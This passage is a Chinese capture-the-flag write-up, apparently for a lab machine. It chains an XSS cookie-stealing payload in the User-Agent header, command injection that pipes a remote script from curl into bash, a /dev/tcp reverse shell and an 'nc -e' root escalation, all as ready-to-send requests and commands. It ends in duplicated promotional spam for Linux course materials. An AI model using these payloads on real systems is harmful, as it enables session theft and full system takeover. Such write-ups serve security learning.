结果很长,总结一下:
开放了22和5000端口,22端口自然是openssh,但5000端口这个协议不常见啊,查了一下upnp协议好像是在路由器上运行的服务,不过跑出了http协议,浏览器访问一下
![image-20240328231154619](https://img-blog.csdnimg.cn/img_convert/1ed59c18b76efe8a9d90ae8164e26269.png)
同时dirsearch跑一跑爆出了/dashboard目录
显示是一个正在建设的网站,底下有一个提交问题的按钮,看看内容
![image-20240328231316785](https://img-blog.csdnimg.cn/img_convert/a161bb00b0c725d28b2d4ed0db3a3313.png)
底下有一个表单,是提交信息的,可以随便填填看看,另外用紫色小插件获得的信息如下:
![image-20240328231517707](https://img-blog.csdnimg.cn/img_convert/52bc758e821d42509c3f823148dd961b.png)
网站使用了python中的flask模板,所以现在了一下几个攻击思路:
1.SSTI注入(flask)
2.sql注入(表单)
3.xss(表单+网站场景)
遂一个一个尝试,于是打开burp随便输入了一个SSTI的%a0截断
![image-20240328232041419](https://img-blog.csdnimg.cn/img_convert/a0a786085f64e11a289fc9e5d5bc7be0.png)
爆出了一个waf页面,提示这个browser information会被发送给管理员,哦豁,好像xss的可能性增加了(就是xss)
另外dashboard提示如下:
![image-20240329000051503](https://img-blog.csdnimg.cn/img_convert/f2504808921d01bff8288cb2b05aa42e.png)
说明我们没有权限,这更加确定了xss的方向
### 二、获得立足点
所以我们在浏览器的基本信息里插入xss看看会不会成功吧,这里选择user-agent字段
于是有以下数据包:
POST /support HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: <img src=15m0 οnerrοr=fetch(“http://10.10.16.62:8666/?cookie=”+document.cookie);>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/support
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
fname=1&lname=1&email=1@1.com&phone=1&message=1%0a{{1*1}}
这里我们要故意让这个数据包触发违规,这样数据包才能发送到管理员那里。这样我们就构造好了一个恶意xss数据包,但是别着急,我们还要在本地用python开一个服务器以便接收请求
python3 -m http.server 8666
![image-20240328233055371](https://img-blog.csdnimg.cn/img_convert/8d568a4f84b984f8647b794f05b62911.png)
然后我们发送数据包给网站,然后静静等待
![image-20240328235421981](https://img-blog.csdnimg.cn/img_convert/729b11d39f155e49ffed4e9cd06a4c0b.png)
果然弹出了cookie
cookie如下:
is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
接下来我们去拿着这个cookie访问一下dirsearch扫出的dashboard
果然进入了
![image-20240329000327321](https://img-blog.csdnimg.cn/img_convert/30cb72b7c7447e34f967937433dba263.png)
目前就这一个按钮,我们抓包看看
![image-20240329000553564](https://img-blog.csdnimg.cn/img_convert/237178b2cef16a1d5d6e591f76354ff7.png)
在添加了Cookie字段后发现了一个post包里发送了一个date字段,这里就试试看能不能反弹shell吧
于是有以下数据包
POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 54
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/dashboard
Cookie:is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
date=2023-09-15;curl http://10.10.16.62:8888/shell.sh|bash;
当然这里我们将以下代码写入shell.sh中
#!/bin/bash
/bin/bash -c ‘exec bash -i >& /dev/tcp/10.10.16.62/1234 0>&1’
然后我们python来搭建服务器
python3 -m http.server 8888 -d ./
然后
nc -nlvp 1234
发送数据包等待
![image-20240329001924633](https://img-blog.csdnimg.cn/img_convert/873ee3051cf0208a90d4955a7abdfca0.png)
成功拿到shell!
cat /home/dvir/user.txt
user-flag:c5e4641fae4f2485fcd83f06dc2679f6
### 三、提权
![image-20240329002036606](https://img-blog.csdnimg.cn/img_convert/0d00267c37310576cda095025752caba.png)
sudo -l
查看当前用户可以执行的命令
发现有个syscheck文件可以用sudo执行,遂查看内容
cat /usr/bin/syscheck
![image-20240329002306427](https://img-blog.csdnimg.cn/img_convert/6bbd9a92f2e67796f6a11eb4a3a2e93d.png)
发现其实是调用了本地文件夹下的一个initdb.sh文件,那我们只需要向其中写入能让我们提权的代码就好了
echo “nc -e /bin/bash 10.10.16.62 3888” > initdb.sh
然后监听3888端口
nc -nlvp 3888
然后sudo执行程序
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数Linux运维工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年Linux运维全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。**
![img](https://img-blog.csdnimg.cn/img_convert/4a5a65fbd84b0179920890a569940bd2.png)
![img](https://img-blog.csdnimg.cn/img_convert/1e399603a6b2874dd668db5d3173625f.png)
![img](https://img-blog.csdnimg.cn/img_convert/98eed7b3842b17bfe0b36ab001a8a335.png)
![img](https://img-blog.csdnimg.cn/img_convert/09a0bafacd80dc236cde8ce3f6f6c284.png)
![img](https://img-blog.csdnimg.cn/img_convert/5f4853ec6e5c16b54d18757dc58eb680.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Linux运维知识点,真正体系化!**
**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
**如果你觉得这些内容对你有帮助,可以添加VX:vip1024b (备注Linux运维获取)**
![img](https://img-blog.csdnimg.cn/img_convert/34b38d7fbcb8679f38c5c30e6da12eb0.jpeg)
![](https://img-blog.csdnimg.cn/img_convert/9a8cb5f8c0ec69e6499adead0da6e95b.png)
最全的Linux教程,Linux从入门到精通
======================
1. **linux从入门到精通(第2版)**
2. **Linux系统移植**
3. **Linux驱动开发入门与实战**
4. **LINUX 系统移植 第2版**
5. **Linux开源网络全栈详解 从DPDK到OpenFlow**
![华为18级工程师呕心沥血撰写3000页Linux学习笔记教程](https://img-blog.csdnimg.cn/img_convert/59742364bb1338737fe2d315a9e2ec54.png)
第一份《Linux从入门到精通》466页
====================
内容简介
====
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第1版出版后曾经多次印刷,并被51CTO读书频道评为“最受读者喜爱的原创IT技术图书奖”。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书附带1张光盘,内容为本书配套多媒体教学视频。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件,供读者免费下载。
![华为18级工程师呕心沥血撰写3000页Linux学习笔记教程](https://img-blog.csdnimg.cn/img_convert/9d4aefb6a92edea27b825e59aa1f2c54.png)
**本书适合广大Linux初中级用户、开源软件爱好者和大专院校的学生阅读,同时也非常适合准备从事Linux平台开发的各类人员。**
> 需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论
**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
![img](https://img-blog.csdnimg.cn/img_convert/766f09dccbf48d8aa0a54f82844eec95.jpeg)
4.png)
**本书适合广大Linux初中级用户、开源软件爱好者和大专院校的学生阅读,同时也非常适合准备从事Linux平台开发的各类人员。**
> 需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论
**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中...(img-4oywSDHR-1712954042133)]